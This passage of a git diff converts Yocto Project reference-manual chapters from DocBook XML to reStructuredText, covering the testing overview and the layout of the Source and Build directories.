-            <listitem><para>
-                <ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'><filename>ptest</filename></ulink>:
-                Runs tests against packages produced during the build for a
-                given piece of software.
-                The test allows the packages to be be run within a target
-                image.
-                </para></listitem>
-            <listitem><para>
-                <filename>oe-selftest</filename>:
-                Tests combination BitBake invocations.
-                These tests operate outside the OpenEmbedded build system
-                itself.
-                The <filename>oe-selftest</filename> can run all tests by
-                default or can run selected tests or test suites.
-                <note>
-                    Running <filename>oe-selftest</filename> requires
-                    host packages beyond the "Essential" grouping.
-                    See the
-                    "<link linkend='required-packages-for-the-build-host'>Required Packages for the Build Host</link>"
-                    section for more information.
-                </note>
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Originally, much of this testing was done manually.
-        However, significant effort has been made to automate the tests so
-        that more people can use them and the Yocto Project development team
-        can run them faster and more efficiently.
-    </para>
-
-    <para>
-        The Yocto Project's main Autobuilder
-        (<filename>autobuilder.yoctoproject.org</filename>) publicly tests
-        each Yocto Project release's code in the
-        <link linkend='oe-core'>OE-Core</link>, Poky, and BitBake
-        repositories.
-        The testing occurs for both the current state of the
-        "master" branch and also for submitted patches.
-        Testing for submitted patches usually occurs in the
-        "ross/mut" branch in the <filename>poky-contrib</filename> repository
-        (i.e. the master-under-test branch) or in the "master-next" branch
-        in the <filename>poky</filename> repository.
-        <note>
-            You can find all these branches in the Yocto Project
-            <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
-        </note>
-        Testing within these public branches ensures in a publicly visible way
-        that all of the main supposed architectures and recipes in OE-Core
-        successfully build and behave properly.
-    </para>
-
-    <para>
-        Various features such as <filename>multilib</filename>, sub
-        architectures (e.g. <filename>x32</filename>,
-        <filename>poky-tiny</filename>, <filename>musl</filename>,
-        <filename>no-x11</filename> and and so forth),
-        <filename>bitbake-selftest</filename>, and
-        <filename>oe-selftest</filename> are tested as part of
-        the QA process of a release.
-        Complete testing and validation for a release takes the Autobuilder
-        workers several hours.
-        <note>
-            The Autobuilder workers are non-homogeneous, which means regular
-            testing across a variety of Linux distributions occurs.
-            The Autobuilder is limited to only testing QEMU-based setups and
-            not real hardware.
-        </note>
-    </para>
-
-    <para>
-        Finally, in addition to the Autobuilder's tests, the Yocto Project
-        QA team also performs testing on a variety of platforms, which includes
-        actual hardware, to ensure expected results.
-    </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-structure.rst b/documentation/ref-manual/ref-structure.rst
new file mode 100644
index 0000000000..db1ea97979
--- /dev/null
+++ b/documentation/ref-manual/ref-structure.rst
@@ -0,0 +1,874 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**************************
+Source Directory Structure
+**************************
+
+The :term:`Source Directory` consists of numerous files,
+directories and subdirectories; understanding their locations and
+contents is key to using the Yocto Project effectively. This chapter
+describes the Source Directory and gives information about those files
+and directories.
+
+For information on how to establish a local Source Directory on your
+development system, see the
+":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+section in the Yocto Project Development Tasks Manual.
+
+.. note::
+
+   The OpenEmbedded build system does not support file or directory
+   names that contain spaces. Be sure that the Source Directory you use
+   does not contain these types of names.
+
+.. _structure-core:
+
+Top-Level Core Components
+=========================
+
+This section describes the top-level components of the :term:`Source Directory`.
+
+.. _structure-core-bitbake:
+
+``bitbake/``
+------------
+
+This directory includes a copy of BitBake for ease of use. The copy
+usually matches the current stable BitBake release from the BitBake
+project. BitBake, a :term:`Metadata` interpreter, reads the
+Yocto Project Metadata and runs the tasks defined by that data. Failures
+are usually caused by errors in your Metadata and not from BitBake
+itself; consequently, most users do not need to worry about BitBake.
+
+When you run the ``bitbake`` command, the main BitBake executable (which
+resides in the ``bitbake/bin/`` directory) starts. Sourcing the
+environment setup script (i.e. :ref:`structure-core-script`) places
+the ``scripts/`` and ``bitbake/bin/`` directories (in that order) into
+the shell's ``PATH`` environment variable.
+
+For more information on BitBake, see the :doc:`BitBake User Manual
+<bitbake:index>`.
+
+.. _structure-core-build:
+
+``build/``
+----------
+
+This directory contains user configuration files and the output
+generated by the OpenEmbedded build system in its standard configuration
+where the source tree is combined with the output. The :term:`Build Directory`
+is created initially when you ``source``
+the OpenEmbedded build environment setup script (i.e.
+:ref:`structure-core-script`).
+
+It is also possible to place output and configuration files in a
+directory separate from the :term:`Source Directory` by
+providing a directory name when you ``source`` the setup script. For
+information on separating output from your local Source Directory files
+(commonly described as an "out of tree" build), see the
+":ref:`structure-core-script`" section.
+
+.. _handbook:
+
+``documentation/``
+------------------
+
+This directory holds the source for the Yocto Project documentation as
+well as templates and tools that allow you to generate PDF and HTML
+versions of the manuals. Each manual is contained in its own sub-folder;
+for example, the files for this reference manual reside in the
+``ref-manual/`` directory.
+
+.. _structure-core-meta:
+
+``meta/``
+---------
+
+This directory contains the minimal, underlying OpenEmbedded-Core
+metadata. The directory holds recipes, common classes, and machine
+configuration for strictly emulated targets (``qemux86``, ``qemuarm``,
+and so forth.)
+
+.. _structure-core-meta-poky:
+
+``meta-poky/``
+--------------
+
+Designed above the ``meta/`` content, this directory adds just enough
+metadata to define the Poky reference distribution.
+
+.. _structure-core-meta-yocto-bsp:
+
+``meta-yocto-bsp/``
+-------------------
+
+This directory contains the Yocto Project reference hardware Board
+Support Packages (BSPs). For more information on BSPs, see the
+:doc:`../bsp-guide/bsp-guide`.
+
+.. _structure-meta-selftest:
+
+``meta-selftest/``
+------------------
+
+This directory adds additional recipes and append files used by the
+OpenEmbedded selftests to verify the behavior of the build system. You
+do not have to add this layer to your ``bblayers.conf`` file unless you
+want to run the selftests.
+
+.. _structure-meta-skeleton:
+
+``meta-skeleton/``
+------------------
+
+This directory contains template recipes for BSP and kernel development.
+
+.. _structure-core-scripts:
+
+``scripts/``
+------------
+
+This directory contains various integration scripts that implement extra
+functionality in the Yocto Project environment (e.g. QEMU scripts). The
+:ref:`structure-core-script` script prepends this directory to the
+shell's ``PATH`` environment variable.
+
+The ``scripts`` directory has useful scripts that assist in contributing
+back to the Yocto Project, such as ``create-pull-request`` and
+``send-pull-request``.
+
+.. _structure-core-script:
+
+``oe-init-build-env``
+---------------------
+
+This script sets up the OpenEmbedded build environment. Running this
+script with the ``source`` command in a shell makes changes to ``PATH``
+and sets other core BitBake variables based on the current working
+directory. You need to run an environment setup script before running
+BitBake commands. The script uses other scripts within the ``scripts``
+directory to do the bulk of the work.
+
+When you run this script, your Yocto Project environment is set up, a
+:term:`Build Directory` is created, your working
+directory becomes the Build Directory, and you are presented with some
+simple suggestions as to what to do next, including a list of some
+possible targets to build. Here is an example:
+::
+
+   $ source oe-init-build-env
+
+   ### Shell environment set up for builds. ###
+
+   You can now run 'bitbake <target>'
+
+   Common targets are:
+       core-image-minimal
+       core-image-sato
+       meta-toolchain
+       meta-ide-support
+
+   You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+The default output of the ``oe-init-build-env`` script is from the
+``conf-notes.txt`` file, which is found in the ``meta-poky`` directory
+within the :term:`Source Directory`. If you design a
+custom distribution, you can include your own version of this
+configuration file to mention the targets defined by your distribution.
+See the
+":ref:`dev-manual/dev-manual-common-tasks:creating a custom template configuration directory`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+By default, running this script without a Build Directory argument
+creates the ``build/`` directory in your current working directory. If
+you provide a Build Directory argument when you ``source`` the script,
+you direct the OpenEmbedded build system to create a Build Directory of
+your choice. For example, the following command creates a Build
+Directory named ``mybuilds/`` that is outside of the :term:`Source Directory`:
+::
+
+   $ source oe-init-build-env ~/mybuilds
+
+The OpenEmbedded build system uses the template configuration files, which
+are found by default in the ``meta-poky/conf/`` directory in the Source
+Directory. See the
+":ref:`dev-manual/dev-manual-common-tasks:creating a custom template configuration directory`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+.. note::
+
+   The OpenEmbedded build system does not support file or directory
+   names that contain spaces. If you attempt to run the ``oe-init-build-env``
+   script from a Source Directory that contains spaces in either the
+   filenames or directory names, the script returns an error indicating
+   no such file or directory. Be sure to use a Source Directory free of
+   names containing spaces.
+
+.. _structure-basic-top-level:
+
+``LICENSE, README, and README.hardware``
+----------------------------------------
+
+These files are standard top-level files.
+
+.. _structure-build:
+
+The Build Directory - ``build/``
+================================
+
+The OpenEmbedded build system creates the :term:`Build Directory`
+when you run the build environment setup
+script :ref:`structure-core-script`. If you do not give the Build
+Directory a specific name when you run the setup script, the name
+defaults to ``build/``.
+
+For subsequent parsing and processing, the name of the Build directory
+is available via the :term:`TOPDIR` variable.
+
+.. _structure-build-buildhistory:
+
+``build/buildhistory/``
+-----------------------
+
+The OpenEmbedded build system creates this directory when you enable
+build history via the ``buildhistory`` class file. The directory
+organizes build information into image, packages, and SDK
+subdirectories. For information on the build history feature, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _structure-build-conf-local.conf:
+
+``build/conf/local.conf``
+-------------------------
+
+This configuration file contains all the local user configurations for
+your build environment. The ``local.conf`` file contains documentation
+on the various configuration options. Any variable set here overrides
+any variable set elsewhere within the environment unless that variable
+is hard-coded within a file (e.g. by using '=' instead of '?='). Some
+variables are hard-coded for various reasons but such variables are
+relatively rare.
+
+At a minimum, you would normally edit this file to select the target
+``MACHINE``, which package types you wish to use
+(:term:`PACKAGE_CLASSES`), and the location from
+which you want to access downloaded files (``DL_DIR``).
+
+If ``local.conf`` is not present when you start the build, the
+OpenEmbedded build system creates it from ``local.conf.sample`` when you
+``source`` the top-level build environment setup script
+:ref:`structure-core-script`.
+
+The source ``local.conf.sample`` file used depends on the
+``$TEMPLATECONF`` script variable, which defaults to ``meta-poky/conf/``
+when you are building from the Yocto Project development environment,
+and to ``meta/conf/`` when you are building from the OpenEmbedded-Core
+environment. Because the script variable points to the source of the
+``local.conf.sample`` file, this implies that you can configure your
+build environment from any layer by setting the variable in the
+top-level build environment setup script as follows:
+::
+
+   TEMPLATECONF=your_layer/conf
+
+Once the build process gets the sample
+file, it uses ``sed`` to substitute final
+``${``\ :term:`OEROOT`\ ``}`` values for all
+``##OEROOT##`` values.
+
+.. note::
+
+   You can see how the ``TEMPLATECONF`` variable is used by looking at the
+   ``scripts/oe-setup-builddir``` script in the :term:`Source Directory`.
+   You can find the Yocto Project version of the ``local.conf.sample`` file in
+   the ``meta-poky/conf`` directory.
+
+.. _structure-build-conf-bblayers.conf:
+
+``build/conf/bblayers.conf``
+----------------------------
+
+This configuration file defines
+:ref:`layers <dev-manual/dev-manual-common-tasks:understanding and creating layers>`,
+which are directory trees, traversed (or walked) by BitBake. The
+``bblayers.conf`` file uses the :term:`BBLAYERS`
+variable to list the layers BitBake tries to find.
+
+If ``bblayers.conf`` is not present when you start the build, the
+OpenEmbedded build system creates it from ``bblayers.conf.sample`` when
+you ``source`` the top-level build environment setup script (i.e.
+:ref:`structure-core-script`).
+
+As with the ``local.conf`` file, the source ``bblayers.conf.sample``
+file used depends on the ``$TEMPLATECONF`` script variable, which
+defaults to ``meta-poky/conf/`` when you are building from the Yocto
+Project development environment, and to ``meta/conf/`` when you are
+building from the OpenEmbedded-Core environment. Because the script
+variable points to the source of the ``bblayers.conf.sample`` file, this
+implies that you can base your build from any layer by setting the
+variable in the top-level build environment setup script as follows:
+::
+
+   TEMPLATECONF=your_layer/conf
+
+Once the build process gets the sample file, it uses ``sed`` to substitute final
+``${``\ :term:`OEROOT`\ ``}`` values for all ``##OEROOT##`` values.
+
+.. note::
+
+   You can see how the ``TEMPLATECONF`` variable ``scripts/oe-setup-builddir``
+   script in the :term:`Source Directory`. You can find the Yocto Project
+   version of the ``bblayers.conf.sample`` file in the ``meta-poky/conf/``
+   directory.
+
+.. _structure-build-conf-sanity_info:
+
+``build/cache/sanity_info``
+---------------------------
+
+This file indicates the state of the sanity checks and is created during
+the build.
+
+.. _structure-build-downloads:
+
+``build/downloads/``
+--------------------
+
+This directory contains downloaded upstream source tarballs. You can
+reuse the directory for multiple builds or move the directory to another
+location. You can control the location of this directory through the
+``DL_DIR`` variable.
+
+.. _structure-build-sstate-cache:
+
+``build/sstate-cache/``
+-----------------------
+
+This directory contains the shared state cache. You can reuse the
+directory for multiple builds or move the directory to another location.
+You can control the location of this directory through the
+``SSTATE_DIR`` variable.
+
+.. _structure-build-tmp:
+
+``build/tmp/``
+--------------
+
+The OpenEmbedded build system creates and uses this directory for all
+the build system's output. The :term:`TMPDIR` variable
+points to this directory.
+
+BitBake creates this directory if it does not exist. As a last resort,
+to clean up a build and start it from scratch (other than the
+downloads), you can remove everything in the ``tmp`` directory or get
+rid of the directory completely. If you do, you should also completely
+remove the ``build/sstate-cache`` directory.
+
+.. _structure-build-tmp-buildstats:
+
+``build/tmp/buildstats/``
+-------------------------
+
+This directory stores the build statistics.
+
+.. _structure-build-tmp-cache:
+
+``build/tmp/cache/``
+--------------------
+
+When BitBake parses the metadata (recipes and configuration files), it
+caches the results in ``build/tmp/cache/`` to speed up future builds.
+The results are stored on a per-machine basis.
+
+During subsequent builds, BitBake checks each recipe (together with, for
+example, any files included or appended to it) to see if they have been
+modified. Changes can be detected, for example, through file
+modification time (mtime) changes and hashing of file contents. If no
+changes to the file are detected, then the parsed result stored in the
+cache is reused. If the file has changed, it is reparsed.
+
+.. _structure-build-tmp-deploy:
+
+``build/tmp/deploy/``
+---------------------
+
+This directory contains any "end result" output from the OpenEmbedded
+build process. The :term:`DEPLOY_DIR` variable points
+to this directory. For more detail on the contents of the ``deploy``
+directory, see the
+":ref:`images-dev-environment`" and
+":ref:`sdk-dev-environment`" sections in the Yocto
+Project Overview and Concepts Manual.
+
+.. _structure-build-tmp-deploy-deb:
+
+``build/tmp/deploy/deb/``
+-------------------------
+
+This directory receives any ``.deb`` packages produced by the build
+process. The packages are sorted into feeds for different architecture
+types.
+
+.. _structure-build-tmp-deploy-rpm:
+
+``build/tmp/deploy/rpm/``
+-------------------------
+
+This directory receives any ``.rpm`` packages produced by the build
+process. The packages are sorted into feeds for different architecture
+types.
+
+.. _structure-build-tmp-deploy-ipk:
+
+``build/tmp/deploy/ipk/``
+-------------------------
+
+This directory receives ``.ipk`` packages produced by the build process.
+
+.. _structure-build-tmp-deploy-licenses:
+
+``build/tmp/deploy/licenses/``
+------------------------------
+
+This directory receives package licensing information. For example, the
+directory contains sub-directories for ``bash``, ``busybox``, and
+``glibc`` (among others) that in turn contain appropriate ``COPYING``
+license files with other licensing information. For information on
+licensing, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _structure-build-tmp-deploy-images:
+
+``build/tmp/deploy/images/``
+----------------------------
+
+This directory is populated with the basic output objects of the build
+(think of them as the "generated artifacts" of the build process),
+including things like the boot loader image, kernel, root filesystem and
+more. If you want to flash the resulting image from a build onto a
+device, look here for the necessary components.
+
+Be careful when deleting files in this directory. You can safely delete
+old images from this directory (e.g. ``core-image-*``). However, the
+kernel (``*zImage*``, ``*uImage*``, etc.), bootloader and other
+supplementary files might be deployed here prior to building an image.
+Because these files are not directly produced from the image, if you
+delete them they will not be automatically re-created when you build the
+image again.
+
+If you do accidentally delete files here, you will need to force them to
+be re-created. In order to do that, you will need to know the target
+that produced them. For example, these commands rebuild and re-create
+the kernel files:
+::
+
+   $ bitbake -c clean virtual/kernel
+   $ bitbake virtual/kernel
+
+.. _structure-build-tmp-deploy-sdk:
+
+``build/tmp/deploy/sdk/``
+-------------------------
+
+The OpenEmbedded build system creates this directory to hold toolchain
+installer scripts which, when executed, install the sysroot that matches
+your target hardware. You can find out more about these installers in
+the ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _structure-build-tmp-sstate-control:
+
+``build/tmp/sstate-control/``
+-----------------------------
+
+The OpenEmbedded build system uses this directory for the shared state
+manifest files. The shared state code uses these files to record the
+files installed by each sstate task so that the files can be removed
+when cleaning the recipe or when a newer version is about to be
+installed. The build system also uses the manifests to detect and
+produce a warning when files from one task are overwriting those from
+another.
+
+.. _structure-build-tmp-sysroots-components:
+
+``build/tmp/sysroots-components/``
+----------------------------------
+
+This directory is the location of the sysroot contents that the task
+:ref:`ref-tasks-prepare_recipe_sysroot`
+links or copies into the recipe-specific sysroot for each recipe listed
+in :term:`DEPENDS`. Population of this directory is
+handled through shared state, while the path is specified by the
+:term:`COMPONENTS_DIR` variable. Apart from a few
+unusual circumstances, handling of the ``sysroots-components`` directory
+should be automatic, and recipes should not directly reference
+``build/tmp/sysroots-components``.
+
+.. _structure-build-tmp-sysroots:
+
+``build/tmp/sysroots/``
+-----------------------
+
+Previous versions of the OpenEmbedded build system used to create a
+global shared sysroot per machine along with a native sysroot. Beginning
+with the 2.3 version of the Yocto Project, sysroots exist in
+recipe-specific :term:`WORKDIR` directories. Thus, the
+``build/tmp/sysroots/`` directory is unused.
+
+.. note::
+
+   The ``build/tmp/sysroots/`` directory can still be populated using the
+   ``bitbake build-sysroots`` command and can be used for compatibility in some
+   cases. However, in general it is not recommended to populate this directory.
+   Individual recipe-specific sysroots should be used.
+
+.. _structure-build-tmp-stamps:
+
+``build/tmp/stamps/``
+---------------------
+
+This directory holds information that BitBake uses for accounting
+purposes to track what tasks have run and when they have run. The
+directory is sub-divided by architecture, package name, and version.
+Following is an example:
+::
+
+      stamps/all-poky-linux/distcc-config/1.0-r0.do_build-2fdd....2do
+
+Although the files in the directory are empty of data, BitBake uses the filenames
+and timestamps for tracking purposes.
+
+For information on how BitBake uses stamp files to determine if a task
+should be rerun, see the
+":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _structure-build-tmp-log:
+
+``build/tmp/log/``
+------------------
+
+This directory contains general logs that are not otherwise placed using
+the package's ``WORKDIR``. Examples of logs are the output from the
+``do_check_pkg`` or ``do_distro_check`` tasks. Running a build does not
+necessarily mean this directory is created.
+
+.. _structure-build-tmp-work:
+
+``build/tmp/work/``
+-------------------
+
+This directory contains architecture-specific work sub-directories for
+packages built by BitBake. All tasks execute from the appropriate work
+directory. For example, the source for a particular package is unpacked,
+patched, configured and compiled all within its own work directory.
+Within the work directory, organization is based on the package group
+and version for which the source is being compiled as defined by the
+:term:`WORKDIR`.
+
+It is worth considering the structure of a typical work directory. As an
+example, consider ``linux-yocto-kernel-3.0`` on the machine ``qemux86``
+built within the Yocto Project. For this package, a work directory of
+``tmp/work/qemux86-poky-linux/linux-yocto/3.0+git1+<.....>``, referred
+to as the ``WORKDIR``, is created. Within this directory, the source is
+unpacked to ``linux-qemux86-standard-build`` and then patched by Quilt.
+(See the ":ref:`using-a-quilt-workflow`" section in
+the Yocto Project Development Tasks Manual for more information.) Within
+the ``linux-qemux86-standard-build`` directory, standard Quilt
+directories ``linux-3.0/patches`` and ``linux-3.0/.pc`` are created, and
+standard Quilt commands can be used.
+
+There are other directories generated within ``WORKDIR``. The most
+important directory is ``WORKDIR/temp/``, which has log files for each
+task (``log.do_*.pid``) and contains the scripts BitBake runs for each
+task (``run.do_*.pid``). The ``WORKDIR/image/`` directory is where "make
+install" places its output that is then split into sub-packages within
+``WORKDIR/packages-split/``.
+
+.. _structure-build-tmp-work-tunearch-recipename-version:
+
+``build/tmp/work/tunearch/recipename/version/``
+-----------------------------------------------
+
+The recipe work directory - ``${WORKDIR}``.
+
+As described earlier in the
+":ref:`structure-build-tmp-sysroots`" section,
+beginning with the 2.3 release of the Yocto Project, the OpenEmbedded
+build system builds each recipe in its own work directory (i.e.
+:term:`WORKDIR`). The path to the work directory is
+constructed using the architecture of the given build (e.g.
+:term:`TUNE_PKGARCH`, :term:`MACHINE_ARCH`, or "allarch"), the recipe
+name, and the version of the recipe (i.e.
+:term:`PE`\ ``:``\ :term:`PV`\ ``-``\ :term:`PR`).
+
+A number of key subdirectories exist within each recipe work directory:
+
+-  ``${WORKDIR}/temp``: Contains the log files of each task executed for
+   this recipe, the "run" files for each executed task, which contain
+   the code run, and a ``log.task_order`` file, which lists the order in
+   which tasks were executed.
+
+-  ``${WORKDIR}/image``: Contains the output of the
+   :ref:`ref-tasks-install` task, which corresponds to
+   the ``${``\ :term:`D`\ ``}`` variable in that task.
+
+-  ``${WORKDIR}/pseudo``: Contains the pseudo database and log for any
+   tasks executed under pseudo for the recipe.
+
+-  ``${WORKDIR}/sysroot-destdir``: Contains the output of the
+   :ref:`ref-tasks-populate_sysroot` task.
+
+-  ``${WORKDIR}/package``: Contains the output of the
+   :ref:`ref-tasks-package` task before the output is
+   split into individual packages.
+
+-  ``${WORKDIR}/packages-split``: Contains the output of the
+   ``do_package`` task after the output has been split into individual
+   packages. Subdirectories exist for each individual package created by
+   the recipe.
+
+-  ``${WORKDIR}/recipe-sysroot``: A directory populated with the target
+   dependencies of the recipe. This directory looks like the target
+   filesystem and contains libraries that the recipe might need to link
+   against (e.g. the C library).
+
+-  ``${WORKDIR}/recipe-sysroot-native``: A directory populated with the
+   native dependencies of the recipe. This directory contains the tools
+   the recipe needs to build (e.g. the compiler, Autoconf, libtool, and
+   so forth).
+
+-  ``${WORKDIR}/build``: This subdirectory applies only to recipes that
+   support builds where the source is separate from the build artifacts.
+   The OpenEmbedded build system uses this directory as a separate build
+   directory (i.e. ``${``\ :term:`B`\ ``}``).
+
+.. _structure-build-work-shared:
+
+``build/tmp/work-shared/``
+--------------------------
+
+For efficiency, the OpenEmbedded build system creates and uses this
+directory to hold recipes that share a work directory with other
+recipes. In practice, this is only used for ``gcc`` and its variants
+(e.g. ``gcc-cross``, ``libgcc``, ``gcc-runtime``, and so forth).
+
+.. _structure-meta:
+
+The Metadata - ``meta/``
+========================
+
+As mentioned previously, :term:`Metadata` is the core of the
+Yocto Project. Metadata has several important subdivisions:
+
+.. _structure-meta-classes:
+
+``meta/classes/``
+-----------------
+
+This directory contains the ``*.bbclass`` files. Class files are used to
+abstract common code so it can be reused by multiple packages. Every
+package inherits the ``base.bbclass`` file. Examples of other important
+classes are ``autotools.bbclass``, which in theory allows any
+Autotool-enabled package to work with the Yocto Project with minimal
+effort. Another example is ``kernel.bbclass`` that contains common code
+and functions for working with the Linux kernel. Functions like image
+generation or packaging also have their specific class files such as
+``image.bbclass``, ``rootfs_*.bbclass`` and ``package*.bbclass``.
+
+For reference information on classes, see the
+":ref:`ref-manual/ref-classes:Classes`" chapter.
+
+.. _structure-meta-conf:
+
+``meta/conf/``
+--------------
+
+This directory contains the core set of configuration files that start
+from ``bitbake.conf`` and from which all other configuration files are
+included. See the include statements at the end of the ``bitbake.conf``
+file and you will note that even ``local.conf`` is loaded from there.
+While ``bitbake.conf`` sets up the defaults, you can often override
+these by using the (``local.conf``) file, machine file or the
+distribution configuration file.
+
+.. _structure-meta-conf-machine:
+
+``meta/conf/machine/``
+----------------------
+
+This directory contains all the machine configuration files. If you set
+``MACHINE = "qemux86"``, the OpenEmbedded build system looks for a
+``qemux86.conf`` file in this directory. The ``include`` directory
+contains various data common to multiple machines. If you want to add
+support for a new machine to the Yocto Project, look in this directory.
+
+.. _structure-meta-conf-distro:
+
+``meta/conf/distro/``
+---------------------
+
+The contents of this directory controls any distribution-specific
+configurations. For the Yocto Project, the ``defaultsetup.conf`` is the
+main file here. This directory includes the versions and the ``SRCDATE``
+definitions for applications that are configured here. An example of an
+alternative configuration might be ``poky-bleeding.conf``. Although this
+file mainly inherits its configuration from Poky.
+
+.. _structure-meta-conf-machine-sdk:
+
+``meta/conf/machine-sdk/``
+--------------------------
+
+The OpenEmbedded build system searches this directory for configuration
+files that correspond to the value of
+:term:`SDKMACHINE`. By default, 32-bit and 64-bit x86
+files ship with the Yocto Project that support some SDK hosts. However,
+it is possible to extend that support to other SDK hosts by adding
+additional configuration files in this subdirectory within another
+layer.
+
+.. _structure-meta-files:
+
+``meta/files/``
+---------------
+
+This directory contains common license files and several text files used
+by the build system. The text files contain minimal device information
+and lists of files and directories with known permissions.
+
+.. _structure-meta-lib:
+
+``meta/lib/``
+-------------
+
+This directory contains OpenEmbedded Python library code used during the
+build process.
+
+.. _structure-meta-recipes-bsp:
+
+``meta/recipes-bsp/``
+---------------------
+
+This directory contains anything linking to specific hardware or
+hardware configuration information such as "u-boot" and "grub".
+
+.. _structure-meta-recipes-connectivity:
+
+``meta/recipes-connectivity/``
+------------------------------
+
+This directory contains libraries and applications related to
+communication with other devices.
+
+.. _structure-meta-recipes-core:
+
+``meta/recipes-core/``
+----------------------
+
+This directory contains what is needed to build a basic working Linux
+image including commonly used dependencies.
+
+.. _structure-meta-recipes-devtools:
+
+``meta/recipes-devtools/``
+--------------------------
+
+This directory contains tools that are primarily used by the build
+system. The tools, however, can also be used on targets.
+
+.. _structure-meta-recipes-extended:
+
+``meta/recipes-extended/``
+--------------------------
+
+This directory contains non-essential applications that add features
+compared to the alternatives in core. You might need this directory for
+full tool functionality or for Linux Standard Base (LSB) compliance.
+
+.. _structure-meta-recipes-gnome:
+
+``meta/recipes-gnome/``
+-----------------------
+
+This directory contains all things related to the GTK+ application
+framework.
+
+.. _structure-meta-recipes-graphics:
+
+``meta/recipes-graphics/``
+--------------------------
+
+This directory contains X and other graphically related system
+libraries.
+
+.. _structure-meta-recipes-kernel:
+
+``meta/recipes-kernel/``
+------------------------
+
+This directory contains the kernel and generic applications and
+libraries that have strong kernel dependencies.
+
+.. _structure-meta-recipes-lsb4:
+
+``meta/recipes-lsb4/``
+----------------------
+
+This directory contains recipes specifically added to support the Linux
+Standard Base (LSB) version 4.x.
+
+.. _structure-meta-recipes-multimedia:
+
+``meta/recipes-multimedia/``
+----------------------------
+
+This directory contains codecs and support utilities for audio, images
+and video.
+
+.. _structure-meta-recipes-rt:
+
+``meta/recipes-rt/``
+--------------------
+
+This directory contains package and image recipes for using and testing
+the ``PREEMPT_RT`` kernel.
+
+.. _structure-meta-recipes-sato:
+
+``meta/recipes-sato/``
+----------------------
+
+This directory contains the Sato demo/reference UI/UX and its associated
+applications and configuration data.
+
+.. _structure-meta-recipes-support:
+
+``meta/recipes-support/``
+-------------------------
+
+This directory contains recipes used by other recipes, but that are not
+directly included in images (i.e. dependencies of other recipes).
+
+.. _structure-meta-site:
+
+``meta/site/``
+--------------
+
+This directory contains a list of cached results for various
+architectures. Because certain "autoconf" test results cannot be
+determined when cross-compiling due to the tests not able to run on a
+live system, the information in this directory is passed to "autoconf"
+for the various architectures.
+
+.. _structure-meta-recipes-txt:
+
+``meta/recipes.txt``
+--------------------
+
+This file is a description of the contents of ``recipes-*``.
diff --git a/documentation/ref-manual/ref-structure.xml b/documentation/ref-manual/ref-structure.xml
deleted file mode 100644
index 27f17dd919..0000000000
--- a/documentation/ref-manual/ref-structure.xml
+++ /dev/null
@@ -1,1122 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-structure'>
-
-<title>Source Directory Structure</title>
-
-<para>
-    The <link linkend='source-directory'>Source Directory</link>
-    consists of numerous files, directories and subdirectories;
-    understanding their locations and contents is key to using the
-    Yocto Project effectively.
-    This chapter describes the Source Directory and gives information about
-    those files and directories.
-</para>
-
-<para>
-    For information on how to establish a local Source Directory on your
-    development system, see the
-    "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
-    section in the Yocto Project Development Tasks Manual.
-</para>
-
-    <note>
-        The OpenEmbedded build system does not support file or directory names that
-        contain spaces.
-        Be sure that the Source Directory you use does not contain these types
-        of names.
-    </note>
-
-<section id='structure-core'>
-    <title>Top-Level Core Components</title>
-
-    <para>
-        This section describes the top-level components of the
-        <link linkend='source-directory'>Source Directory</link>.
-    </para>
-
-    <section id='structure-core-bitbake'>
-        <title><filename>bitbake/</filename></title>
-
-        <para>
-            This directory includes a copy of BitBake for ease of use.
-            The copy usually matches the current stable BitBake release from
-            the BitBake project.
-            BitBake, a
-            <link linkend='metadata'>Metadata</link>
-            interpreter, reads the Yocto Project Metadata and runs the tasks
-            defined by that data.
-            Failures are usually caused by errors in your Metadata and not from BitBake itself;
-            consequently, most users do not need to worry about BitBake.
-        </para>
-
-        <para>
-            When you run the <filename>bitbake</filename> command, the
-            main BitBake executable (which resides in the
-            <filename>bitbake/bin/</filename> directory) starts.
-            Sourcing the environment setup script (i.e.
-            <link linkend="structure-core-script"><filename>&OE_INIT_FILE;</filename></link>)
-            places the <filename>scripts/</filename> and
-            <filename>bitbake/bin/</filename> directories (in that order) into
-            the shell's <filename>PATH</filename> environment variable.
-        </para>
-
-        <para>
-            For more information on BitBake, see the
-            <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-        </para>
-    </section>
-
-    <section id='structure-core-build'>
-        <title><filename>build/</filename></title>
-
-        <para>
-            This directory contains user configuration files and the output
-            generated by the OpenEmbedded build system in its standard configuration where
-            the source tree is combined with the output.
-            The
-            <link linkend='build-directory'>Build Directory</link>
-            is created initially when you <filename>source</filename>
-            the OpenEmbedded build environment setup script
-            (i.e.
-            <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
-        </para>
-
-        <para>
-            It is also possible to place output and configuration
-            files in a directory separate from the
-            <link linkend='source-directory'>Source Directory</link>
-            by providing a directory name when you <filename>source</filename>
-            the setup script.
-            For information on separating output from your local
-            Source Directory files (commonly described as an "out of tree" build), see the
-            "<link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>"
-            section.
-        </para>
